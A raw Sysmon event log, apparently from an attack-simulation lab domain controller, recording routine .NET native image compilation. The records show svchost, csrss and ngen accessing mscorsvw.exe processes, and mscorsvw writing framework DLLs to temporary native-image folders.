13:46:53.813{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-5102-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.797{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-5102-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:53.797{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-5102-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-5002-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.766{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-5002-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.766{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-5002-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:53.688{59A5CD1D-914D-6005-4F02-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4a4-0\System.AddIn.dll2021-01-18 13:46:53.688 10341000x80000000000000006509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.219{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-4F02-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.204{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-4F02-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:53.204{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-4F02-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.157{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-4E02-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.157{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-4E02-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.157{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-4E02-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914E-6005-5502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.969{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-914E-6005-5502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:54.969{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914E-6005-5502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.907{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914E-6005-5402-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.891{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914E-6005-5402-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.891{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914E-6005-5402-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:54.813{59A5CD1D-914D-6005-5302-00000000A301}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\119c-0\System.ComponentModel.Composition.dll2021-01-18 13:46:54.813 10341000x80000000000000006548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914F-6005-5A02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.750{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914F-6005-5A02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:55.750{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914F-6005-5A02-00000000A301}4360C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:55.703{59A5CD1D-914F-6005-5902-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e40-0\System.Data.DataSetExtensions.dll2021-01-18 13:46:55.703 10341000x80000000000000006544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:55.578{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914F-6005-5902-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:55.578{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914F-6005-5902-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:55.578{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914F-6005-5902-00000000A301}3648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 